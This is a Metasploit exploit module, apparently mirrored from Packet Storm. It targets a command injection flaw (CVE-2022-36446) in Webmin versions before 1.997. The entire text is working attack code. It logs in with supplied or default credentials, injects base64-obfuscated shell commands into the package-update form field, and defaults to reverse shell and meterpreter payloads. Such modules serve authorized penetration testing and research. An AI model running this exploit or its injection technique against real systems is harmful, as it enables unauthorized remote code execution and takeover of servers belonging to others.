Share
## https://sploitus.com/exploit?id=PACKETSTORM:168049
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Webmin Package Updates RCE',  
'Description' => %q{  
This module exploits an arbitrary command injection in Webmin  
versions prior to 1.997.  
  
Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform  
package updates and installation. Due to a lack of input  
sanitization, it is possibe to inject arbitrary command that will be  
concatenated to the package manager call.  
  
This exploit requires authentication and the account must have access  
to the Software Package Updates module.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Christophe De La Fuente', # MSF module  
'Emir Polat' # Discovery and PoC  
],  
'References' => [  
[ 'EDB', '50998' ],  
[ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],  
[ 'CVE', '2022-36446']  
],  
'DisclosureDate' => '2022-07-26',  
'Platform' => ['unix', 'linux'],  
'Privileged' => true,  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],  
'Payload' => { 'BadChars' => '/' },  
'DefaultOptions' => {  
'RPORT' => 10000,  
'SSL' => true  
},  
'Targets' => [  
[  
'Unix In-Memory',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_memory,  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }  
}  
],  
[  
'Linux Dropper (x86 & x64)',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :linux_dropper,  
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }  
}  
],  
[  
'Linux Dropper (ARM64)',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_AARCH64,  
'Type' => :linux_dropper,  
'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }  
}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),  
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),  
OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])  
]  
)  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path)  
)  
  
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res  
  
if res.body.include?('This web server is running in SSL mode.')  
return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")  
end  
  
version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first  
  
return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version  
  
version = Rex::Version.new(version)  
  
vprint_status("Webmin #{version} detected")  
  
unless version < Rex::Version.new('1.997')  
return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")  
end  
  
vprint_good("Webmin #{version} is a supported target")  
  
CheckCode::Appears  
rescue ::Rex::ConnectionError  
return CheckCode::Unknown("#{peer} - Could not connect to web service")  
end  
  
def do_login  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),  
'headers' => { 'Referer' => full_uri },  
'cookie' => 'testing=1',  
'keep_cookies' => true,  
'vars_post' => {  
'user' => datastore['USERNAME'],  
'pass' => datastore['PASSWORD']  
}  
})  
  
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res  
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302  
  
print_good('Logged in!')  
end  
  
def execute_command(cmd, _opts = {})  
cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')  
cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"  
  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'),  
'headers' => { 'Referer' => full_uri },  
'vars_post' => {  
'mode' => 'new',  
'search' => rand_text(10),  
'redir' => '',  
'redirdesc' => '',  
'u' => cmd,  
'confirm' => 'Install Now'  
}  
})  
end  
  
def exploit  
print_status('Attempting login')  
do_login  
  
print_status('Sending payload')  
case target['Type']  
when :unix_memory  
execute_command(payload.encoded)  
when :linux_dropper  
execute_cmdstager  
end  
rescue ::Rex::ConnectionError  
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  
end  
end